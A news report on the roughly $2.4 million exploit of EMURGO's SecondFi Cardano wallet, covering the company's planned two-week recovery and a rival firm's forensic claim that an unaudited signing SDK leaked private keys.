SecondFi maps recovery path after $2.4 million Cardano wallet exploit, aims to return funds within two weeks

EMURGO, a co-founding entity of the Cardano blockchain, said on Saturday it had found a way to return assets to users of its SecondFi wallet, days after an exploit drained about $2.4 million worth of ADA.

In a statement posted to X, EMURGO CEO Phillip Pon said the company had completed its forensic investigation, validated wallet balances, and identified what he called "a clear recovery solution." He put the timeline at roughly two weeks, with one week to build the recovery mechanism and a second to test it before any returns begin.

Pon told affected users not to move funds or take steps outside SecondFi's official guidance, saying the recovery is being built around the current state of the compromised wallets. He added that no step requiring user participation had started, and that SecondFi would never ask for private keys, seed phrases, or wallet access.

The Saturday post is the first time the company has attached a concrete timeline to the recovery. It has not yet published a full technical postmortem, given per-user recovery amounts, or detailed how users will claim funds.

$2.4 million from 374 addresses taken

SecondFi, the wallet EMURGO rebranded from Yoroi in April, has described four wallet-draining events between June 21 and 23. Three were carried out by external attackers, who took about 16 million ADA, roughly $2.4 million at the time, from 374 addresses.

In the fourth event, SecondFi said it moved about 129 million ADA to an independent third-party custodian as an emergency measure to keep the funds away from the attackers. It said an external accounting firm has been engaged to verify those holdings, and that affected users can file claims through its support site.

The company said it identified two attacker wallets, one of which drained 171 wallets and the other 203, and that about 4 million ADA tied to the theft sits in a flagged collection address under monitoring. It said it has notified law enforcement.

A competing forensic account

SecondFi has blamed an address-level flaw in its wallet-generation software that exposed users' private keys. It has warned that restoring an affected recovery phrase in another wallet does not remove the risk, because the exposure is triggered when a compromised address signs a transaction.

A more specific account has come from Tibane Labs, which published a forensic report on the incident on Saturday. Tibane Labs is developing its own wallet, and its findings track public claims made earlier on X by Mark Karpelès, the former Mt. Gox chief executive who is part of that team, meaning its analysis comes from a competing party.

Tibane said the breach was not due to nonce reuse, the failure mode that broke the PlayStation 3 in 2010, but an Ed25519 signing error. According to the report, the wallet's signer dropped the per-key secret that the standard mixes into each signature, so the value meant to be secret was computed from the public transaction data alone. That left it derivable by anyone and made a single signature enough to reconstruct the private key, with no second transaction or statistical attack required.

Tibane said the vulnerable signer was an experimental, unaudited SDK called trantor, published to npm by an independent developer, that replaced EMURGO's previously shipped and audited build on June 8. The first compromised signature appears onchain that same day, according to the report.

Tibane said the underlying cryptographic library was sound and that the fault lay in how the wallet wired the key into it, leaving the secret nonce material unset. It said it decompiled the signed Android build, matched it to the trantor code, and recovered victim private keys from historical signatures to confirm the mechanism. The Block could not independently verify those findings.

EMURGO has not published a technical postmortem and has not publicly addressed Tibane's attribution to a third-party SDK. Separately, security researcher Taylor Monahan said this week that SecondFi "rolled their own crypto" and that the software was closed source and unaudited.

A founding entity under scrutiny

Yoroi served as Cardano's main lightweight wallet for years before the SecondFi rebrand, and EMURGO is one of the network's three founding organizations. Tibane framed the episode less as a coding error than a governance failure, arguing that a founding entity shipped unaudited code to production in place of an audited build, without an independent review or a test that would have caught the flaw.

The exploit comes with ADA (ADA) trading near multi-year lows. It also follows a separate nonce-related failure earlier this year: The Block reported that the $280 million Drift Protocol exploit turned on the misuse of Solana "durable nonces," though that breach was traced to social engineering rather than flawed wallet code.

By Tibane's measure, only signatures made from June 8 onward are exposed, and transactions signed before that date used the audited implementation.